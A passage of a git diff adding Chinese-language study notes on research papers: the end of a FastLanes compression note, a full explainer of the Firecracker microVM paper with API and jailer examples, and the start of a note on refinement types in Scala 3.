int32_t enc[16], int32_t out[16]) { + const int LANES = 4, STRIDE = 4; + int32_t lane_carry[4] = {0}; + + for (int l = 0; l < LANES; l++) { + int32_t sum = lane_carry[l]; + for (int k = 0; k < STRIDE; k++) { + int idx = l + k * LANES; // UTL 下的访问模式 + sum += enc[idx]; + out[idx] = sum; + } + lane_carry[l] = sum; // 下一块继续 + } +} +``` + +真实 FastLanes 实现还处理 **跨 1024 块边界** 的全局 carry;布局保证 **编译器仍能看到规则 stride 循环**。 + +--- + +## 与 Parquet / ORC 的关系 + +| 维度 | Parquet/ORC(2013 年代) | FastLanes 论文 / 格式 | +|------|--------------------------|------------------------| +| 批大小 | Page / stream 大小不固定 | 固定 **1024** FastLane | +| Bitpack | 顺序比特流 | **Interleaved + MM1024** | +| Tuple 顺序 | 逻辑行序 | **UTL 04261537 重排** | +| SIMD | 各系统手写 intrinsic | **标量 + auto-vectorize** | +| 块压缩 | 常默认 Snappy | 倾向 **仅 LWC**,解码极轻 | + +FastLanes **不是** 要立刻替换所有 Parquet 数据集,而是证明:**LWC 解码可以快到「带宽省下来的时间 > 解码花的时间」**——为 DuckDB、Vortex、GPU decode 等新栈提供布局标准。 + +--- + +## 性能数字(论文 micro-benchmark 摘要) + +- **解码吞吐**:单核 **>100B integers/s**(标量 C,多平台)。 +- **每周期解码**:**>40 values / cycle**(视编码与位宽而定)。 +- **相对加速**:相对传统 layout 的 bitpack/FOR/DELTA/RLE/DICT,**数倍到数量级**(Figure 见原文)。 +- **平台**:Intel、AMD、Apple Silicon、AWS Graviton 均测——布局 **不绑 ISA**。 + +注意:绝对数字随 CPU、位宽 W、是否 L3 cache resident 变化;**布局 + 1024 batch** 是可迁移的设计原则。 + +--- + +## 实现与生态 + +| 项目 | 说明 | +|------|------| +| [cwida/FastLanes](https://github.com/cwida/FastLanes) | 论文作者 C++ 参考实现,含生成器产出大量 bitpack 宽度组合 | +| [spiraldb/fastlanes](https://github.com/spiraldb/fastlanes) | Rust 实现,宏生成 mask/shift;**与 C++ 版二进制不兼容**(bitpack 顺序为 fused kernel 优化) | +| [fastlanes.io](https://fastlanes.io) | 新一代列存 **文件格式**(Arrow/DuckDB 互操作进行中) | +| Vortex | 压缩 Arrow 库,内置 FastLanes codec | + +验证向量化: + +```bash +RUSTFLAGS='-C target-cpu=native' cargo asm --release --bench bitpacking +``` + +--- + +## 局限与开放问题 + +1. **UTL 重排** 改变逻辑行顺序,需要格式层记录 permute;与 **谓词下推、行级安全** 交互要仔细设计。 +2. **1024 固定 batch** 对极短列有 padding 开销;尾块需单独处理。 +3. **字符串 / 变长类型** 仍以 offset 为主,LWC 优势在 **数值列**。 +4. **GPU 解码** 在后续工作中继续扩展(论文提及,格式博客 2024 列为 roadmap)。 +5. Rust 与 C++ 实现 **布局细节不同**,跨语言读同一文件需统一规范版本。 + +--- + +## 自测题(读完应能答) + +1. 为什么 FastLanes 强调 **1024 元素** 和 **1024 bit 虚拟寄存器** 对齐? +2. **Interleaved bitpack** 解决了传统 bitpack 的哪个 SIMD 痛点? +3. **UTL `04261537`** 想优化的是 DELTA/RLE 的什么问题? +4. 「Scalar code 每秒 1000 亿整数」是否意味着 **没有 SIMD**?实际机器上发生了什么? +5. FOR 之后为什么 bit-packing 更省空间? + +
+参考答案(先自己想再点开) + +1. 1024 是 2 的幂,可被 8/16/32/64 bit lane 整除,使 `lanes = 1024/T` 为整数,且单 batch 适配各级 SIMD 拆分。 +2. 传统顺序比特流有 **跨值 bit 依赖**;按 lane 交错后,每个 lane 内 pack/unpack **指令相同、偏移规律**,循环可向量化。 +3. 朴素 DELTA/RLE **串行依赖**;UTL 把 tuple 洗牌成 **多 lane 短链**,块内可并行 scan,仅保留少量 lane 间 carry。 +4. **不是**。源码无 intrinsic,但编译器把 lane 循环 **auto-vectorize** 成 AVX/NEON;宽发射 CPU 也让多条标量指令并行。 +5. FOR 把大整数变成 **小残差** → 每个值只需 **W bit(W≪32)** → bitpack 输入 entropy 更低。 + +
+ +--- + +## 延伸阅读 + +- Afroozeh & Boncz, **PVLDB 16(9), 2023**, doi:[10.14778/3598581.3598587](https://doi.org/10.14778/3598581.3598587) +- Nick Gates, [Life in the FastLanes](https://nickgates.com/notes/life-in-the-fastlanes/) — bitpack 与 auto-vectorize 入门 +- 本仓库笔记:[列式存储格式实证评估(Parquet vs ORC)](./columnar-storage-formats-2023.md) — LWC 与 Snappy 层在 2023 年的 trade-off +- Zeng et al., VLDB 2023 — 为何 **CPU 解码** 重新成为列存瓶颈 + +--- + +## 一句话总结 + +**FastLanes 把「轻量压缩」从串行比特技巧,升级成面向 1024-lane 并行与编译器 auto-vectorize 的内存布局标准——让列存解码在现代 CPU 上快到接近免费,同时避免 SIMD intrinsic 的平台债。** diff --git a/src/content/docs/papers/firecracker-microvm-2020.md b/src/content/docs/papers/firecracker-microvm-2020.md new file mode 100644 index 000000000..badc6ae74 --- /dev/null +++ b/src/content/docs/papers/firecracker-microvm-2020.md @@ -0,0 +1,335 @@ +--- +title: Firecracker — 为 Serverless 量身定制的轻量虚拟化 +来源: https://www.usenix.org/system/files/nsdi20-paper-agache.pdf +日期: 2026-06-13 +子分类: 内核与虚拟化 +分类: 操作系统 +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你经营一家**按次计费的共享厨房**(这就是 AWS Lambda 一类 serverless 平台): + +- 每个顾客(租户)带自己的菜谱和食材(任意 Linux 二进制),你只负责提供灶台和水电。 +- 顾客一走,灶台必须**立刻洗干净**,给下一位用;高峰时要**几百个灶台同时开火**。 +- 更麻烦的是:顾客可能互相不信任——你不能让 A 顾客的酱料瓶出现在 B 顾客的柜子里。 + +有三种常见做法: + +| 做法 | 日常类比 | 优点 | 缺点 | +|------|----------|------|------| +| **Linux 容器**(Docker) | 大家共用同一套中央供水供电,靠隔间板分开 | 开档快、占地小 | 隔间板是软件做的;中央系统(内核)一破,全场沦陷 | +| **传统虚拟机**(QEMU+KVM) | 每位顾客单独租一整间带独立水电的商铺 | 墙是砖砌的(硬件隔离) | 装修太重:BIOS、USB、声卡……启动要几秒,空铺也占几十 MB | +| **Firecracker microVM** | 只建**极简单间**:门、电、水龙头、排水口,别的不要 | 砖墙隔离 + 单间装修极简 | 不能开餐厅(无 GPU)、不能搬家(无 live migration) | + +这篇 NSDI 2020 论文由 Alexandru Agache 等 AWS 工程师撰写,讲的是第三种:**保留 KVM 硬件虚拟化的安全边界,把 QEMU 那 140 万行通用 VMM 换成约 5 万行 Rust 专用 VMM**。Firecracker 自 2018 年起支撑 AWS Lambda 与 Fargate,每月处理数万亿次请求。 + +## 这篇论文在说什么 + +| 维度 | 内容 | +|------|------| +| 会议 | 17th USENIX NSDI,2020 年 2 月,Santa Clara | +| 页码 | 419–434 | +| 作者 | Alexandru Agache, Marc Brooker, Andreea Florescu 等(Amazon Web Services) | +| 开源 | 2018 年 12 月 Apache 2.0 发布 | +| 生产部署 | AWS Lambda、AWS Fargate | + +论文要回答的核心问题: + +1. **多租户 serverless** 能否同时做到 VM 级隔离与容器级密度? +2. **专门为 serverless 裁剪** 的 VMM 应长什么样——砍什么、留什么、为什么? +3. 把 Lambda 从「容器 + EC2」迁到 Firecracker,工程上踩了哪些坑? + +## 为什么值得读(零基础也能建立图景) + +即使你从未写过 hypervisor,这篇论文也能帮你理解今天云原生里反复出现的张力: + +- **安全 vs 兼容**:容器靠 seccomp 限制 syscall,syscall 越少越安全,但用户代码越容易挂;VM 把不可信代码关进 guest 内核,宿主只需信 VMM。 +- **通用 vs 专用**:QEMU 能启动 Windows、模拟声卡;Lambda 只需要 Linux + virtio 网卡/磁盘——专用工具在窄场景里能快一个数量级。 +- **分层借力**:CPU 虚拟化交给 KVM(见 [[kvm-2007]]),调度/内存交给 Linux,Firecracker 只做设备模拟和 API——这和 unikernel([[mirage-unikernel-2013]])「只带咖啡机」是同一哲学在不同层的重演。 + +## 核心概念一:隔离方案的三岔路 + +论文第 2 节系统比较了三种隔离路线。 + +### Linux 容器 + +依赖 cgroups、namespaces、seccomp-bpf、chroot 等内核机制。问题是:**所有容器共享一个内核**。安全边界是「能调用哪些 syscall」——典型 Ubuntu 需要 224 个 syscall 才能正常运行,攻击面很难缩到足够小。侧信道(Spectre、/proc 信息泄露)也持续爆出 CVE。 + +### 语言虚拟机隔离 + +JVM、V8 isolates 等在单进程内隔离,对「跑任意 Linux 二进制」的 Lambda 不适用。 + +### KVM 虚拟化 + +每个 workload 有**自己的 guest 内核 + 独立页表**,硬件(Intel VT-x / AMD-V)负责截获特权指令。代价是传统 QEMU 太重:论文引用 Tsai 等的工作,QEMU 单独就需要多达 270 个 syscall。 + +**Firecracker 的立场**:保留 KVM,**替换 QEMU**。 + +``` +传统路径: 用户代码 → guest 内核 → KVM → QEMU(140万行)→ 宿主内核 + +Firecracker: 用户代码 → guest 内核 → KVM → Firecracker(~5万行 Rust)→ 宿主内核 +``` + +Figure 1(论文)对比了两种安全模型: + +- **容器**:不可信代码直接打宿主内核(可能带 seccomp 沙箱) +- **虚拟化**:不可信代码只打 guest 内核;VMM + KVM 限制 guest 内核 + +## 核心概念二:Firecracker 刻意不做什么 + +论文 1.1 节「Specialization」列了一张「不做清单」——这对理解 microVM 至关重要: + +| 没有的功能 | 为什么砍掉 | +|------------|------------| +| BIOS、任意内核启动 | 只支持 VMM 直接加载的 Linux 内核镜像 | +| PCI、USB、声卡、显卡 | serverless 不需要;每多一个模拟设备就多一份 TCB | +| VM live migration | Lambda slot 寿命以小时计,用完即弃 | +| 编排 / 打包 | 交给 Kubernetes、containerd;Firecracker 只替代 QEMU | +| Windows guest | 设备模型太窄 | + +**一个 Firecracker 进程 = 一台 microVM**。进程边界即安全边界,运维人员用 `ps`、`top`、`kill` 就能管理整机上的上千个 microVM。 + +## 核心概念三:极简设备模型 + +Firecracker 只模拟 **5 类设备**(论文 3.1 节): + +| 设备 | 用途 | +|------|------| +| `virtio-net` | 网络(经 TUN/TAP 接到宿主) | +| `virtio-block` | 块设备磁盘(**刻意不用文件系统直通**,缩小宿主攻击面) | +| `virtio-vsock` | 宿主与客户机的高效 IPC | +| serial console | 日志与调试 | +| i8042 键盘控制器 | 不到 50 行 Rust,仅用于接收关机信号 | + +对比 QEMU 的 40+ 种设备。virtio 块设备整套实现约 1400 行 Rust。 + +## 核心概念四:REST API 与启动流水线 + +Firecracker 通过 **Unix socket 上的 REST API** 配置 microVM,而不是传统 QEMU 的命令行参数。好处是: + +1. 可以先 `fork` 进程、配好内核/磁盘/网络,**暂不启动**(pre-configured) +2. 需要时再 `InstanceStart`,把冷启动藏进预热池 +3. OpenAPI 规范,任何语言都能调 + +论文测得(5.1 节,单 vCPU、256MB、裁剪内核): + +| 场景 | 典型启动时间 | +|------|--------------| +| QEMU | ~2× 于 Firecracker | +| Firecracker 端到端(含 API 配置) | 中位数约 100ms 量级 | +| Firecracker 预配置后启动 | 99 分位约 146ms | +| Ubuntu 18.04 默认内核在 Firecracker 上 | **额外 +900ms**(探测不存在的 legacy 设备) | + +内存开销(5.2 节):Firecracker 每 VM 约 **3MB**,Cloud Hypervisor ~13MB,QEMU ~**131MB**。 + +密度:单主机可达 **150 个 microVM/秒** 创建速率;Lambda worker 上每台跑数百至数千个 slot。 + +## 核心概念五:Jailer 与纵深防御 + +安全不只靠「代码少」: + +1. **Rust**:内存安全,减少 VMM 自身漏洞 +2. **Jailer**(3.4.1 节):在启动 Firecracker 前把它关进 `chroot` + pid/network namespace + 降权 + **seccomp 白名单仅 24 个 syscall** +3. **生产加固**:禁用 SMT(超线程)、KPTI、禁用 swap、避免 samepage merging 等(见官方 prod-host-setup 文档) + +## 核心概念六:在 AWS Lambda 里怎么落地 + +论文第 4 节是全文最有「系统感」的部分。 + +### 控制面与数据面 + +``` +Invoke API → Frontend → Worker Manager(粘性路由) + ↓ + Placement(约 <20ms 选 worker) + ↓ + Worker 上的 MicroManager + ↓ + Firecracker microVM(一个 slot = 一个函数沙箱) +``` + +### Slot 复用 + +同一函数的多次调用可复用已启动的 microVM。论文 Listing 1 的 Node.js 例子: + +```javascript +var i = 0; +exports.handler = async (event, context) => { + return i++; +}; +``` + +连续 invoke 会返回递增数字,说明 **VM 与进程状态被保留**——这是「温启动」快的原因。 + +### 预热池与 Little 定律 + +125ms 启动虽快,但 Lambda 扩容路径有时要**同步**等 slot。MicroManager 维护 **pre-booted microVM 池**。论文用 Little 定律:池大小 = 创建速率 × 创建延迟;125ms 延迟下,每秒 8 次新建就需要 1 个预热实例。 + +### Slot 状态机 + +``` +Init → Idle ⇄ Busy → Dead +``` + +空闲 slot 占内存(约等于服务器资本成本的 40%);忙碌时还要 CPU、缓存、网络。多租户把不同客户的函数混在同一 worker,负载近似独立,统计多路复用效率随 √N 提升——这是 serverless **经济学**的数学底座。 + +### 无缝迁移 + +2018 年起,AWS 把 Lambda 从「每客户 EC2 + 容器」迁到 **裸金属 EC2 上的 Firecracker**,**对用户无感知**。技巧:slot 最长 12 小时回收,改回收逻辑即可逐步切换;先迁内部 workload,对比 metrics,DNS 缓存配置出过一回滚。 + +## 代码示例一:用 REST API 启动一台 microVM + +下面是与论文 3.2 节 API 模型对应的最小流程(需已安装 `firecracker` 与 `curl`)。API 走 Unix socket,故用 `--unix-socket`: + +```bash +API_SOCKET="/tmp/firecracker.socket" +rm -f "$API_SOCKET" + +# 1. 后台启动 Firecracker 进程,监听 API +firecracker --api-sock "$API_SOCKET" & + +# 2. 配置 guest 机器:1 vCPU,128 MiB 内存 +curl --unix-socket "$API_SOCKET" -X PUT \ + "http://localhost/machine-config" \ + -H "Content-Type: application/json" \ + -d '{"vcpu_count": 1, "mem_size_mib": 128, "smt": false}' + +# 3. 指定内核镜像与启动参数(须为 Firecracker 裁剪过的 microvm 内核) +curl --unix-socket "$API_SOCKET" -X PUT \ + "http://localhost/boot-source" \ + -H "Content-Type: application/json" \ + -d '{ + "kernel_image_path": "/path/to/vmlinux", + "boot_args": "console=ttyS0 reboot=k panic=1 pci=off" + }' + +# 4. 挂载 rootfs 块设备 +curl --unix-socket "$API_SOCKET" -X PUT \ + "http://localhost/drives/rootfs" \ + -H "Content-Type: application/json" \ + -d '{ + "drive_id": "rootfs", + "path_on_host": "/path/to/rootfs.ext4", + "is_root_device": true, + "is_read_only": false + }' + +# 5. 启动 guest +curl --unix-socket "$API_SOCKET" -X PUT \ + "http://localhost/actions" \ + -H "Content-Type: application/json" \ + -d '{"action_type": "InstanceStart"}' +``` + +论文强调:**预配置**(步骤 2–4 提前做完,步骤 5 在请求到来时才调)能把启动时间压到接近图 5 里的「FC-pre」曲线——这正是 Lambda 预热池的做法。 + +## 代码示例二:Jailer 如何把 Firecracker 关进笼子 + +Jailer 是独立二进制,典型调用形如: + +```bash +# 示意:具体路径因发行版而异 +jailer --id 12345 \ + --exec-file /usr/bin/firecracker \ + --uid 1000 --gid 1000 \ + --chroot-base-dir /srv/jailer \ + -- \ + --api-sock /run/firecracker.socket +``` + +Jailer 在 `exec` Firecracker 之前会: + +- 创建仅含必要文件(二进制、`/dev/net/tun`、该 VM 的磁盘镜像、cgroup 文件)的 chroot +- 进入独立的 pid / network namespace +- 应用 seccomp:白名单 **24 个 syscall**,KVM ioctl 另计 + +即使 guest 通过漏洞攻破了 VMM 进程,逃逸后看到的仍是**极简文件系统 + 几乎无 syscall**,这是论文「多层缓解」的具体实现。 + +## 代码示例三:用 vsock 从宿主向 guest 发命令 + +Lambda 的 MicroManager 与 guest 内 shim 走 TCP/IP(论文 4.1.2),但 Firecracker 更推荐 **virtio-vsock** 做宿主↔客户机控制通道: + +```bash +# 宿主侧:向 CID=3(guest)端口 1024 发送一行命令 +socat VSOCK-CONNECT:3:1024 - +``` + +```python +# guest 内极简监听(Python 3,需内核启用 vsock) +import socket +s = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) +s.bind((socket.VMADDR_CID_ANY, 1024)) +s.listen(1) +conn, _ = s.accept() +print(conn.recv(1024).decode()) +conn.close() +``` + +vsock 不经过虚拟网卡栈,延迟更低,也减少「从网络面打进 microVM」的攻击面——新人常踩的坑是以为能 `ssh root@`,而生产环境往往根本不给 tap 配路由。 + +## 论文评估:六个设计目标达标了吗? + +第 2 节提出的理想方案六条标准,第 5 节用实验回应: + +| 标准 | Firecracker 结论 | +|------|------------------| +| **Isolation** | 硬件 VM 边界;配合 SMT 关闭与内核缓解应对侧信道 | +| **Overhead / Density** | ~3MB/VM;远优于 QEMU 的 ~131MB | +| **Performance** | virtio 路径足够;块 IO 当时有序列化瓶颈(论文承认,后续改进) | +| **Compatibility** | 任意 Linux 二进制,无需重编译 | +| **Fast Switching** | 125ms 级启动;150 VM/s 创建 | +| **Soft Allocation** | 依赖宿主 Linux 调度与 cgroup,VMM 内建 token-bucket 限速器 | + +与 **Intel Cloud Hypervisor**(同源 rust-vmm)、**QEMU 4.2 最小构建**对比,Firecracker 在启动时间与内存开销上全面领先;块设备随机读 IOPS 则不如 QEMU 优化充分——论文坦诚这是已知限制。 + +## 与相关工作的位置 + +| 项目 | 关系 | +|------|------| +| [[kvm-2007]] | Firecracker 的 CPU/内存虚拟化底座 | +| [[xen-2003]] | 另一条 hypervisor 路线;Firecracker 是 Type-2(宿主 Linux + KVM) | +| [[denali-2002]] | 千 VM 密度思想的学术先驱 | +| [[mirage-unikernel-2013]] | 更激进地砍掉 guest OS;Firecracker 选择兼容未修改 Linux | +| Kata Containers | 也用 VM 包容器,多基于 QEMU;Firecracker 更瘦 | +| gVisor | 用户态 syscall 拦截, opposite trade-off | +| crosvm / rust-vmm | Firecracker 从 crosvm fork 后删到一半行数再演进 | + +## 踩坑与误解 + +1. **不是容器替代品**:Firecracker 替代的是 **QEMU 那一层**,不是 Docker;编排仍靠 containerd/K8s。 +2. **内核必须裁剪**:直接用 Ubuntu stock kernel 会多探测 900ms;要关 serial 日志、内置驱动、禁用模块。 +3. **块 IO 耐久性**:论文发表时 Firecracker 块设备未实现 flush,高性能写入以耐久性为代价——读论文要连**评测条件**一起看。 +4. **侧信道无银弹**:Meltdown/Spectre 后需宿主、固件、调度策略协同;Firecracker 文档列出长清单,不是「开了 VM 就万事大吉」。 +5. **与 firecracker-2020 笔记的关系**:本仓库 [[firecracker-2020]] 是更短的速读版;本篇按论文结构展开,适合零基础第一遍精读。 + +## 学到什么 + +1. **窄场景值得重写底层**:当 95% 的 QEMU 功能用不上时,重写 VMM 比优化 QEMU 更划算。 +2. **借力清单要清晰**:KVM 做虚拟化、Linux 做调度、virtio 做设备、OpenAPI 做配置——每层只做一件事。 +3. **安全是架构决策**:块设备而非 fs 直通、进程 per VM、Jailer seccomp——从设计第一天就写进代码。 +4. **经济学驱动技术**:125ms 不是炫技,它直接决定预热池大小与多租户能否赚钱。 +5. **生产迁移可以渐进**:slot 回收替换、内外部客户分批、可回滚——论文第 4.3 节是值得复制的 playbook。 + +## 延伸阅读 + +- 论文 PDF:[Firecracker: Lightweight Virtualization for Serverless Applications](https://www.usenix.org/system/files/nsdi20-paper-agache.pdf) +- 官方站点:[firecracker-microvm.github.io](https://firecracker-microvm.github.io/) +- 复现实验数据:[nsdi2020-data](https://github.com/firecracker-microvm/nsdi2020-data) +- 生产宿主加固:[prod-host-setup.md](https://github.com/firecracker-microvm/firecracker/blob/master/docs/prod-host-setup.md) +- Jeff Barr 博文:[Firecracker – Lightweight Virtualization for Serverless Computing](https://aws.amazon.com/blogs/aws/firecracker-lightweight-virtualization-for-serverless-computing/) + +## 关联 + +- [[kvm-2007]] — Linux 内核如何变成 hypervisor +- [[xen-2003]] — 半虚拟化时代的另一条路 +- [[denali-2002]] — 高密度轻量 VM 的早期实验 +- [[mirage-unikernel-2013]] — 编译期裁 OS 的极端方案 +- [[firecracker-2020]] — 本主题的短笔记版本 +- [[on-demand-container-loading]] — Lambda 上块设备与镜像加载的后续工程 + +## 反向链接 + + diff --git a/src/content/docs/papers/first-class-refinement-scala.md b/src/content/docs/papers/first-class-refinement-scala.md new file mode 100644 index 000000000..bac5f88ca --- /dev/null +++ b/src/content/docs/papers/first-class-refinement-scala.md @@ -0,0 +1,285 @@ +--- +title: First-Class Refinement Types for Scala — 把「带条件的类型」写进 Scala 3 本身 +来源: 'Bovel, Kunčak & Odersky, "First-Class Refinement Types for Scala", arXiv:2605.08369, 2026' +日期: 2026-06-13 +子分类: 类型与 PL 理论 +分类: 编程语言 +provenance: pipeline-v3 +--- + +## 从日常类比开始:VIP 名单不是贴在门外的便签 + +想象一家 nightclub 的入场规则: + +- **普通做法**:门口保安只认身份证上的「是否成年」(相当于 `Int`、`String` 这类基础类型)。至于「是否穿正装、是否在 guest list 上」,另有一张**手写便签**贴在保安亭里——保安和前台各看各的,规则不一致时,客人会在两个窗口之间来回解释。 +- **理想做法**:guest list 直接写进**同一份正式名册**。前台登记时,姓名后面就带上「仅限 VIP 区」;保安、调酒师、储物柜系统读的都是同一份数据,子集关系也自然成立——「VIP」一定是「已入场客人」的子集。 + +编程里的 **refinement type(精化类型)** 就是给类型加逻辑谓词: +`{ x: Int | x > 0 }` 表示「正整数」,比裸 `Int` 更窄。 + +Liquid Haskell、F*、Dafny 等系统早已证明:这种「类型 + 谓词」的轻量验证很管用——数组下标不越界、除数不为零、协议状态机不变量,都可以写进类型。 + +但 Liquid Haskell 的典型写法是: + +```haskell +{-@ x :: {v:Int | v mod 2 == 0} @-} +let x = 42 :: Int in ... +``` + +注意 **`Int` 写了两遍**:一遍给 GHC,一遍给 LiquidHaskell 插件。两套类型检查器、两套报错、两套 IDE 心智模型。Gamboa 等人 2025 年的可用性研究里,有参与者说:「好像在同时跟 GHC 和 LiquidHaskell 说话。」 + +这篇论文(EPFL,Matt Bovel、Viktor Kunčak、Martin Odersky)的核心主张是:**在 Scala 3 里,精化类型应该是 first-class——和普通类型一样,参与子类型、推断、模式匹配、重载解析**,而不是编译器外的第二层。 + +Liquid Haskell 的例子在 Scala 3 原型里变成: + +```scala +val x: (Int with x % 2 == 0) = 42 +``` + +`Int with x % 2 == 0` 就是**普通 Scala 类型**,不是注释里的注解。 + +--- + +## 是什么 + +**First-Class Refinement Types for Scala** 提出并实现了 Scala 3 精化类型的完整设计: + +1. **语法**:两种写法——长形式 `{ v: T with p(v) }` 与短形式 `T with p`(复用外层绑定名)。 +2. **语义**:谓词是 Scala 表达式的一个**纯子集**;采用**部分正确性(partial correctness)**——程序若终止且返回值存在,则满足谓词;不要求证明终止。 +3. **类型推断**:保留 Scala 原有 widening,不强行给每个中间表达式推断最精类型;用 **equality facts(等式事实)** 和 **selfification(自化)** 按需恢复精度。 +4. **证明义务**:编译器内置轻量 **e-graph 求解器**(约 600 行),不依赖外部 SMT;IDE 里每次按键都能跑。 +5. **形式化**:在 Rocq 中 mechanize 核心演算 soundness,覆盖依赖函数类型、有界多态、正等递归类型、并/交类型与精化类型的组合。 +6. **工程**:作为 Dotty(Scala 3 编译器)原型扩展,约 2500 行改动。 + +论文状态:2026 年 5 月 arXiv 草稿(`2605.08369`),与 [scala/scala3#21586](https://github.com/scala/scala3/pull/21586) 工作相关。 + +--- + +## 为什么重要 + +### 1. 解决「两套类型系统」的结构性问题 + +Schmid & Kunčak 2016 年在旧版 Dotty 上做过 qualified types,但 refinement checker **与 Scala 类型检查器 largely independent**。结果是:精化类型流不进泛型代码、无法与 Scala 推断协同、需要单独的 qualifier 推断——难以扩展。 + +用户态库 **Iron**、**Refined** 走另一条路:用 opaque type + implicit evidence 模拟约束,能复用 Scala 工具链,但证明能力受 implicit 解析限制,没有专用算术/等式决策过程。 + +First-class 设计的目标是:**一条类型检查管线、一种报错语言、一种推断行为**。 + +### 2. 与 Scala 既有特性自然组合 + +精化类型是基类型的**子类型**(refinement <: base),因此: + +- **有界多态**里,`U <: T` 可以实例化为精化类型; +- **重载解析**会选更具体的签名; +- **模式匹配**可以把精化类型当 pattern,运行时分支。 + +这些在「外挂 refinement 层」的架构里往往要单独造机制;在 first-class 设计里从子类型直接推出。 + +### 3. 工业编译器上的可行性 + +不是只在论文语言里演示:作者 fork Dotty,改 bidirectional type checker 的一个 reconciliation 点,加 e-graph solver,benchmark 显示编译开销仍较低——说明「主流 OO 语言 + 丰富子类型」与 refinement 可以共存。 + +--- + +## 核心概念 + +### 1. Refinement type 的两种语法 + +**长形式**(显式 binder,用于返回值等没有现成名的情况): + +```scala +def fill[T](n: Int, v: T): { r: Vec[T] with r.len == n } = ??? +``` + +**短形式**(复用 `val`/参数名,desugar 为长形式): + +```scala +val x: (Int with x % 2 == 0) = 42 +// 等价于 +val x: { v: Int with v % 2 == 0 } = 42 +``` + +谓词 **reuse Scala 表达式语法**,但语义上限制在纯 fragment:常量、stable identifier、`val` 字段选择、构造器、布尔/比较/算术等。可变变量、引用相等类不能出现在谓词里。 + +### 2. 子类型:精化类型是基类型的子集 + +若 `p ⇒ q`(谓词蕴含),则 `{ x: T | p(x) } <: { x: T | q(x) }`。 +任意 `{ x: T | p(x) } <: T`——精化类型可当作基类型用。 + +这是 bounded polymorphism 与重载能工作的根基。 + +### 3. 部分正确性 vs 全正确性 + +- **全正确性**(Liquid Haskell、System FR):还要证明终止,否则 unsound。 +- **部分正确性**(本文):只要**能返回**,返回值满足谓词;不终止的表达式理论上可赋「假谓词」类型,但强迫求值的路径不可达。 + +取舍:Scala 是通用语言,要求终止证明 adoption 成本太高;部分正确性仍覆盖大量实践(边界检查、除零、格式验证)。 + +### 4. Mixed-precision 推断:equality facts + +若每个 `val x = 1 + 2` 都推断成 `{ v: Int | v == 1 + 2 }`,会破坏: + +- **向后兼容**(implicit / overload 依赖推断类型); +- **性能**(类型变大、比较变慢); +- **可读性**(满屏 singleton union)。 + +因此 **`val mPlusN = m + n` 仍推断为 `Int`**,但上下文记录 **`mPlusN ~ m + n`**。当后续需要 `{ r: Vec[...] with r.len == m + n }` 时,求解器用等式替换验证义务。 + +### 5. Selfification:把表达式「抬」进类型 + +检查表达式 `e: T` 是否符合期望 `{ x: T | p(x) }` 时,若 `e` 是合法谓词项,可赋 **自引用类型** `{ x: T | x == e }`——无需改变无注解代码的推断,只在需要精度的边界生效。 + +例如 `case class Range(from: Int, until: Int)` 构造结果可 selfify 为 `{ r: Range | r == Range(from, until) }`,配合 skolem 变量,求解器能展开 `?1.from`、`?1.until` 验证循环体里的下标。 + +### 6. E-graph 求解器(内置,无 SMT 依赖) + +义务形式:`P1 ⇒ P2`(假设谓词能否推出目标谓词)。 + +- 收集 qualifier、val 等式、分支条件; +- 插入 **acyclic e-graph**,做 congruence closure; +- 域相关 rewrite:`x + 0 → x`、`x % 2 == 0` 与偶数判定等。 + +优点:无平台相关 SMT 二进制、适合 IDE 实时反馈。 +代价:线性算术等理论**没有完备决策过程**——Schmid 原型里需要 LA 的 benchmark(如 `sumnat`)本文求解器过不了;与 Stainless 的全功能验证不在同一赛道。 + +### 7. 运行时兜底 + +静态证不出的谓词,程序员可显式: + +- **模式匹配**:`case id: ID => ...` 运行时检验; +- **`.runtimeChecked`**:失败抛异常(desugar 为 `if` + `asInstanceOf`)。 + +不自动插入 dynamic check,形式化更简单;且限制在一阶谓词,避开高阶 contract 的 blame assignment 问题。 + +### 8. 形式化核心(Rocq) + +核心演算在 System F<: 上扩展:依赖函数/对、和类型、并/交、精化、正等递归、fuel-bounded definitional interpreter + semantic typing。 + +作者称这是首个 mechanized soundness proof,**同时**组合:精化 + 并/交 + 双界有界多态 + 正等递归——此前 mechanization 未覆盖这一组合(Hamza 2019、Borkowski 2024、Sun 2024 等各覆盖子集)。 + +--- + +## 代码示例 + +### 示例 1:长度索引向量(依赖精化) + +经典「向量长度在类型里」: + +```scala +type Vec[T] + +object Vec: + def fill[T](n: Int, v: T): { r: Vec[T] with r.len == n } = ??? + + extension [T](a: Vec[T]) + def len: Int = ??? + + def concat(b: Vec[T]): { r: Vec[T] with r.len == a.len + b.len } = ??? + + def zip[S](b: Vec[S] with b.len == a.len): { r: Vec[(T, S)] with r.len == a.len } = ??? + +def example3(n: Int, m: Int): { r: Vec[(String, Int)] with r.len == m + n } = + val v1 = Vec.fill(n, 0) + val v2 = Vec.fill(m, 1) + val v3 = v1.concat(v2) + val mPlusN = m + n // 推断仍为 Int,但有 mPlusN ~ m + n + Vec.fill(mPlusN, "").zip(v3) +``` + +要点: + +- `zip` 要求 `b.len == a.len`——**依赖精化**(谓词引用其他绑定)。 +- `mPlusN` 不必写成精化类型;**等式事实**在 `fill(..., "").zip(v3)` 处把义务 discharge 掉。 + +### 示例 2:有界多态 + 重载解析 + +**有界多态**:精化类型实例化类型参数 + +```scala +def maximum[T: Ordering, U <: T](xs: List[U]): U = xs.reduce(max) + +type Even = { v: Int with v % 2 == 0 } + +def example1: Even = maximum(List(2, 4, 6)) +// U 推断为 Even;Even <: Int 满足 U <: T +``` + +**重载**:更具体的精化签名优先 + +```scala +def min(l: List[Int] with l.isSorted): Int = l.head // O(1) +def min(l: List[Int]): Int = l.min // O(n) + +def example2(l: List[Int] with l.isSorted): Int = min(l) +// 调用第一个 overload +``` + +若 refinement 是外挂层,`maximum` / `min` 这类 everyday Scala 代码很难「无感」组合;first-class 子类型让泛型与重载**零额外机制**生效。 + +### 示例 3:运行时精化(模式 + checked cast) + +```scala +type ID = { s: String with s.matches(idRegex) } + +"a2e7-e89b" match + case id: ID => println(s"valid: $id") + case _ => println("invalid") + +val id: ID = userInput.runtimeChecked +``` + +静态证不出时,程序员**显式**选择运行时路径——与 Flanagan 2006 hybrid checking「编译器自动插桩」不同,责任边界清晰。 + +--- + +## 与相关工作的对比(简表) + +| 系统 | Refinement 位置 | 与宿主类型系统 | 求解 / 证明 | +|------|-----------------|----------------|-------------| +| Liquid Haskell | 注释注解 | 分离 phase | 外部 SMT + 终止 | +| Schmid Dotty 2016 | 